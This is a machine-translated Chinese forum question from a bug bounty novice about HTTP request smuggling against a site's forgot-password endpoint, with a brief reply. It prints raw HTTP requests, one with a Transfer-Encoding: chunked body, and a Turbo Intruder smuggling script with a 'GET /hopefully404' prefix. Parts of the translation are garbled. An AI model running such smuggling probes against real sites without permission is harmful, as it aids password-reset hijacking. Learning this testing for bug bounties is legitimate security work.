Security 使用涡轮入侵者时的奇怪反应
我是一个臭虫赏金猎人,对它还不熟悉。几天前,我读到了有关请求走私漏洞的信息。就在那之后,我开始在网上找到它。昨天,我发现一个网站,当我在标题中添加X-Forwarded-Host:google.com时,它将我重定向到了。很难利用这一点,所以我考虑将其与请求走私结合起来。我选择更改密码请求作为目标:Security 使用涡轮入侵者时的奇怪反应,security,request,burp,Security,Request,Burp,我是一个臭虫赏金猎人,对它还不熟悉。几天前,我读到了有关请求走私漏洞的信息。就在那之后,我开始在网上找到它。昨天,我发现一个网站,当我在标题中添加X-Forwarded-Host:google.com时,它将我重定向到了。很难利用这一点,所以我考虑将其与请求走私结合起来。我选择更改密码请求作为目标: POST /my-rx/forgot-password HTTP/1.1 Host: www.example.com User-Agent: Mozilla/5.0 (Windows NT 10.0
POST /my-rx/forgot-password HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Connection: close
Cookie: <my_cookie>
Upgrade-Insecure-Requests: 1
email=mymail%40gmail.com&submit=Reset+My+Password&csrf_token=cb5a82b3df1e45c7b95d25edb46cfbf3
然后我用涡轮入侵者运行它。我非常惊讶,它发送了14个请求,但只有12个请求是503,剩下的2个是200。特别是,在200响应头中,它有…传输编码:chunked。。。。我试过几次,结果都是一样的:1到2个请求就是200个。但在代码中,有一点很奇怪,就是…prefix='GET/hoppully404http/1.1
X-忽略:X'。。。。经过几次测试后,我认为这不是请求走私错误,因为响应显示它是原始请求的响应,而不是代码中的前缀,我也尝试更改前缀,它仍然是200,而不是400,404。。。就像我预料的那样
那么有没有人一定是非常专业的黑客知道我面临什么漏洞?谢谢大家! 首先,你的第一次转化的reuest是在TE中分块的;CL,但在使用打嗝扩展后,您找到了它的CL;所以问题可能就在那里。 对于您有点困惑的回答,我建议您解决portswigger http请求走私实验室,因为我最近已经完成了这项工作,您的基础将变得非常强大
POST /my-rx/forgot-password HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Connection: close
Cookie: <my_cookie>
Upgrade-Insecure-Requests: 1
Transfer-Encoding: chunked
6b
email=mymail%40gmail.com&submit=Reset+My+Password&csrf_token=cb5a82b3df1e45c7b95d25edb46cfbf3
0
# if you edit this file, ensure you keep the line endings as CRLF or you'll have a bad time
def queueRequests(target, wordlists):
# to use Burp's HTTP stack for upstream proxy rules etc, use engine=Engine.BURP
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=5,
requestsPerConnection=1,
resumeSSL=False,
timeout=10,
pipeline=False,
maxRetriesPerRequest=0,
engine=Engine.THREADED,
)
# This will prefix the victim's request. Edit it to achieve the desired effect.
prefix = '''GET /hopefully404 HTTP/1.1
X-Ignore: X'''
# The request engine will auto-fix the content-length for us
attack = target.req + prefix
engine.queue(attack)
victim = target.req
for i in range(14):
engine.queue(victim)
time.sleep(0.05)
def handleResponse(req, interesting):
table.add(req)